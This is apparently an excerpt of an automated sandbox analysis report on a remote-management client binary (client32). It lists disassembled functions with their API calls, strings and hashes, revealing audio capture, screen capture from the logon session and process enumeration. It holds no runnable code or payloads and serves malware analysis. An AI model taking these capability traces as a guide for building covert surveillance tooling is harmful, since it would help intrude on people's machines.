                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0000C0F0,00000000,00000000,?), ref: 1100C75A
                                                                              • GetProcAddress.KERNEL32(?,acmStreamUnprepareHeader), ref: 1100C73F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • SetThreadPriority.KERNEL32(00000000,00000001), ref: 1100C780
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1100C787
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalInitializeSection$CreateExitProcessThreadwsprintf$CloseErrorEventHandleLastLibraryLoadMessagePriorityVersion_malloc_memset_strrchr
                                                                              • String ID: ..\ctl32\AUDIO.CPP$acmStreamClose$acmStreamConvert$acmStreamOpen$acmStreamPrepareHeader$acmStreamSize$acmStreamUnprepareHeader$hAudio$idata->hEvent$msacm32.dll
                                                                              • API String ID: 164558982-2117072583
                                                                              • Opcode ID: cfefa6cb48f10cb449d761e04fb00ecc249e30a8e65a1387da47812114e30642
                                                                              • Instruction ID: 049fab11b20bb768323fb1b34283fa62b23a8e76d4d9a3094b6e7a7a4f077f96
                                                                              • Opcode Fuzzy Hash: cfefa6cb48f10cb449d761e04fb00ecc249e30a8e65a1387da47812114e30642
                                                                              • Instruction Fuzzy Hash: FD61AEB5A40709ABEB20DFB5CD45BDAFBE4AF54304F00492EE96AD7280EB74B500CB50
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                              • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110445AE
                                                                              • _memset.LIBCMT ref: 110445FA
                                                                              • _strncpy.LIBCMT ref: 11044628
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$EnvironmentExpandExtractIconItemObjectRectShowStringsText_memset_strncpy
                                                                              • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                              • API String ID: 3726536655-1930157642
                                                                              • Opcode ID: fa8fde9e457a20ced63446e2290e55f221f982a787cf21ad9a52e8aeb565463c
                                                                              • Instruction ID: fc0abad737311a416c98c50a3634a6be576f3590c14db7ba0421e6f6af2d9a9c
                                                                              • Opcode Fuzzy Hash: fa8fde9e457a20ced63446e2290e55f221f982a787cf21ad9a52e8aeb565463c
                                                                              • Instruction Fuzzy Hash: F1B149B8B40315AFE714CB64CCC5FEAB3A5AF48708F2045A8F6559B6C1DAB1B940CB90
                                                                              APIs
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109E262
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109E285
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1109E290
                                                                              • ResetEvent.KERNEL32(00000000), ref: 1109E2A5
                                                                              • ResetEvent.KERNEL32(?), ref: 1109E2AB
                                                                              • SetEvent.KERNEL32(?), ref: 1109E2B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                              • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                              • API String ID: 1194186020-3727536503
                                                                              • Opcode ID: c107bb4b7b451d0f8caa07485551e788f298ebf9abbf6cfa4dcf7a792082ab30
                                                                              • Instruction ID: 4445ea8f834aec2c07a1bae548667dcf69b2078721e8a9311ea9bd6b0b067be8
                                                                              • Opcode Fuzzy Hash: c107bb4b7b451d0f8caa07485551e788f298ebf9abbf6cfa4dcf7a792082ab30
                                                                              • Instruction Fuzzy Hash: 88B18AB5A002188FD724CF65C990B5AF7F5BB88314F108A9DE55A9B681CB70ED81DFA0
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,AB86ACF8,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11138283
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                              • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                              • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                              • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                              • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                              • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                              • API String ID: 348974188-2591373181
                                                                              • Opcode ID: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                              • Opcode Fuzzy Hash: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,0000139C), ref: 1102034F
                                                                              • GetWindowRect.USER32(00000000), ref: 11020358
                                                                              • GetDlgItem.USER32(?,000013BE), ref: 11020367
                                                                              • GetWindowRect.USER32(00000000), ref: 1102036A
                                                                              • IsWindowVisible.USER32(?), ref: 110203D3
                                                                              • GetDlgItem.USER32(00000000,000013C2), ref: 110204AD
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110204B2
                                                                              • GetDlgItem.USER32(00000000,000013C3), ref: 110204DE
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110204E3
                                                                              • GetDlgItem.USER32(00000000,000013C2), ref: 11020511
                                                                              • ShowWindow.USER32(00000000), ref: 11020514
                                                                              • GetDlgItem.USER32(00000000,000013C3), ref: 11020542
                                                                              • ShowWindow.USER32(00000000), ref: 11020545
                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                              • GetDlgItem.USER32(00100000,0000139C), ref: 110205B5
                                                                              • GetDlgItem.USER32(00100000,0000139C), ref: 110205D5
                                                                              • SetWindowPos.USER32(00000000), ref: 110205D8
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11020619
                                                                              • UpdateWindow.USER32(00000000), ref: 1102066C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$Enable$RectShow$UpdateVisiblewsprintf
                                                                              • String ID: NSMChatExDlg::OnWhiteBoard - Mode %d$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1139678934-4020333243
                                                                              • Opcode ID: bf302f3f50b72fa046df3b71313cba82a1b11e2870ffdb6b8516b1e7006a154a
                                                                              • Instruction ID: d891f5d5e415915a6e5e6ee3e5f20cb4cdde8798b9037e3cc37bb1097e49140c
                                                                              • Opcode Fuzzy Hash: bf302f3f50b72fa046df3b71313cba82a1b11e2870ffdb6b8516b1e7006a154a
                                                                              • Instruction Fuzzy Hash: D7A1B174B40319AFE710CF60CC89F9EB7E6BB88708F108658F5166B6C4C774A941CB94
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$_memset_strrchr
                                                                              • String ID: (%d.%02d.%d.%d)$ + %d bytes$%s + %d bytes$, %s, Line %d$0x%08X $<unknown module>$<unknown symbol>
                                                                              APIs
                                                                                • Part of subcall function 11143CE0: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 11143D1B
                                                                                • Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D2A
                                                                                • Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D3A
                                                                                • Part of subcall function 11143CE0: wsprintfA.USER32 ref: 11143D55
                                                                              • GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111462A5
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111462B2
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111462BF
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111462CC
                                                                              • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 111462D9
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 111462E6
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 111462F3
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11146300
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114630D
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114631A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                              • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110523DB
                                                                              • _malloc.LIBCMT ref: 11052682
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memmove.LIBCMT ref: 110526A5
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040270,?,00000002,00002710,00000000), ref: 11052706
                                                                              • _free.LIBCMT ref: 110523F9
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • Part of subcall function 1103ABC0: GetDateFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000020,AB86ACF8,00000000,?,00000000,?,?,111806E1,000000FF,?,11052885), ref: 1103ABFF
                                                                                • Part of subcall function 1103ABC0: GetTimeFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000010,?,11052885,?,?,?,000003EF,00000000), ref: 1103AC14
                                                                              • _malloc.LIBCMT ref: 1105241A
                                                                              • _memmove.LIBCMT ref: 11052430
                                                                              • GetTickCount.KERNEL32 ref: 11052438
                                                                              • IsWindow.USER32(?), ref: 11052528
                                                                              • _free.LIBCMT ref: 1105270D
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,000003EF,00000000,?,?,?,?,?,?,?,?), ref: 11052898
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$CountFormatHeapTick_malloc_memmove$AllocateDateErrorFileFreeLastMessageModuleNameSendTimeTimeoutWindow
                                                                              • String ID: Client$DisableMessage$IsA()$Message$Result of SendMessage %d$Send Message to StudentUI$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$pcicl32.dll$toastImageAndText.png$toastMessage.png
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 11043660: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                • Part of subcall function 11043660: GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                • Part of subcall function 11043660: IsWindow.USER32(00000000), ref: 110436DE
                                                                                • Part of subcall function 11043660: GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                              • GetCursorPos.USER32(?), ref: 1104A5B4
                                                                              • WindowFromPoint.USER32(?,?,?,00000000,00000000,00000000), ref: 1104A5DB
                                                                              • GetClassNameA.USER32(00000000,?,00000040), ref: 1104A5ED
                                                                              • WaitForInputIdle.USER32(00000000,000003E8), ref: 1104A708
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 1104A71B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 1104A724
                                                                              • GetCursorPos.USER32(?), ref: 1104A72D
                                                                              • EnumWindows.USER32(11043760,?), ref: 1104A784
                                                                              • GetWindowRect.USER32(?,?), ref: 1104A7A0
                                                                              • WindowFromPoint.USER32(?,?,?,?,?,?,00000000,00000000,00000000), ref: 1104A7BA
                                                                              • GetClassNameA.USER32(00000000,?,00000040), ref: 1104A7C9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
                                                                              • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(111EDE24), ref: 1100C10D
                                                                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 1100C1D3
                                                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 1100C1E0
                                                                              • Sleep.KERNEL32(000003E8), ref: 1100C204
                                                                              • GetTickCount.KERNEL32 ref: 1100C24D
                                                                              • _free.LIBCMT ref: 1100C28A
                                                                                • Part of subcall function 1100B440: _malloc.LIBCMT ref: 1100B496
                                                                                • Part of subcall function 1100B440: EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,AB86ACF8,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                • Part of subcall function 1100B440: CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                • Part of subcall function 1100B440: _calloc.LIBCMT ref: 1100B519
                                                                                • Part of subcall function 1100B440: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                • Part of subcall function 1100B440: LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                              • _free.LIBCMT ref: 1100C411
                                                                              • GetTickCount.KERNEL32 ref: 1100C419
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C435
                                                                              • waveInUnprepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C442
                                                                              • waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C44F
                                                                              • waveInAddBuffer.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C45C
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C463
                                                                              • _free.LIBCMT ref: 1100C4C3
                                                                              • InterlockedDecrement.KERNEL32(111EDE24), ref: 1100C506
                                                                              Strings
                                                                              • Audio, xrefs: 1100C0FB
                                                                              • Audiothread stopped, threadcnt=%d, xrefs: 1100C513
                                                                              • Audiothread started, threadcnt=%d, xrefs: 1100C119
                                                                              • Vista AudioCap FreeInstance (pAudioCap=%p), xrefs: 1100C4E1
                                                                              • Error %d waiting for audio (nEvents=%d), xrefs: 1100C1F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$_freewave$CountCreateEnterHeaderInterlockedLeaveTick$BufferDecrementErrorEventFileIncrementLastMultipleObjectsPrepareSleepUnprepareWait_calloc_malloc
                                                                              • String ID: Audio$Audiothread started, threadcnt=%d$Audiothread stopped, threadcnt=%d$Error %d waiting for audio (nEvents=%d)$Vista AudioCap FreeInstance (pAudioCap=%p)
                                                                              • API String ID: 4143487924-3268596948
                                                                              • Opcode ID: 298505100148be32d1e9fec23b522e3c1f0abcd0da0ad9fbcc93395b7ec93c2b
                                                                              • Instruction ID: ce4536ffc1536091952ef6b0c0b09b4d7bc44372ab8792d62394f68665881c24
                                                                              • Opcode Fuzzy Hash: 298505100148be32d1e9fec23b522e3c1f0abcd0da0ad9fbcc93395b7ec93c2b
                                                                              • Instruction Fuzzy Hash: 66C1E774E00717ABF708CFB4C984BAEF7A4FF45348F1082A5E96996641EB30B951CB91
                                                                              APIs
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                              • GetDC.USER32(00000000), ref: 1105D2BB
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                              • GetTickCount.KERNEL32 ref: 1105D30F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                              • GetTickCount.KERNEL32 ref: 1105D33C
                                                                              • GetLastError.KERNEL32(?), ref: 1105D348
                                                                              • GdiFlush.GDI32 ref: 1105D35C
                                                                              • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                              • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                              • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                              • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                              • API String ID: 652520247-4094952007
                                                                              • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                              • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __strdup_free
                                                                              • String ID: CheckRMLocation, SetChannel to [%s]$CheckRMLocation, check machine key$CheckRMLocation, check user key$CheckRMLocation, opened user key$CheckRMLocation, read [%s] from config$Client$Current Location$CurrentLocation$IsA()$RM user location=%s, assumed roaming$RoomSpec$SOFTWARE\RM\Connect$SOFTWARE\Research Machines\Network Management\Location Chooser$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$wwww
                                                                              • API String ID: 514621754-348489473
                                                                              • Opcode ID: 877a55279de5c964de4bb8d742acd01462f9f85157a0cf375f6da65e02bb0981
                                                                              • Instruction ID: c92d473af6dc16d9041c27a8538e010972664b76a85a87ccff2e3b1cf8fe9cea
                                                                              • Opcode Fuzzy Hash: 877a55279de5c964de4bb8d742acd01462f9f85157a0cf375f6da65e02bb0981
                                                                              • Instruction Fuzzy Hash: 1BD1E579E4061B9FDB05DFA4DC91FEDF371AF95348F108124E82277688EA31A905CBA1
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111063D4
                                                                              • EnterCriticalSection.KERNEL32(111F160C,?,00000000), ref: 111063ED
                                                                              • GetTickCount.KERNEL32 ref: 111063F3
                                                                              • wsprintfA.USER32 ref: 1110645D
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?), ref: 1110649F
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 11106520
                                                                              • SetLastError.KERNEL32(00000078), ref: 11106539
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 1110656D
                                                                              • GetTickCount.KERNEL32 ref: 111065F7
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,?,00000000), ref: 11106600
                                                                              Strings
                                                                              • Session\%u\NSMWClass, xrefs: 11106457
                                                                              • GetProcessId, xrefs: 11106518
                                                                              • Kernel32.dll, xrefs: 1110649A
                                                                              • PostMessage WMCLOSE to s%d (%d) ret %d, xrefs: 1110655B
                                                                              • Warning. took %d ms to get simap lock, xrefs: 11106403
                                                                              • Error. IPC(%s) = %s, xrefs: 1110648D
                                                                              • Warning. simap lock held for %d ms, xrefs: 11106614
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalLibrarySection$AddressEnterErrorFreeLastLeaveLoadProcwsprintf
                                                                              • String ID: Error. IPC(%s) = %s$GetProcessId$Kernel32.dll$PostMessage WMCLOSE to s%d (%d) ret %d$Session\%u\NSMWClass$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 3106348785-779848922
                                                                              • Opcode ID: 22985117de42114c4f55f01eabbacc0e62c5ae72103d16d90366e20abc0df78e
                                                                              • Instruction ID: 4e61fecc55a67ddd152895a92d9d18be16dde1e4b229261976b39b48e73fe7d6
                                                                              • Opcode Fuzzy Hash: 22985117de42114c4f55f01eabbacc0e62c5ae72103d16d90366e20abc0df78e
                                                                              • Instruction Fuzzy Hash: C4719FB5D012699FCB20DF65CD88A9EFBB4BB05304F6045E9D419A7605DB31AE80CF90
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 110EB5D8
                                                                              • GetTickCount.KERNEL32 ref: 110EB632
                                                                              • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
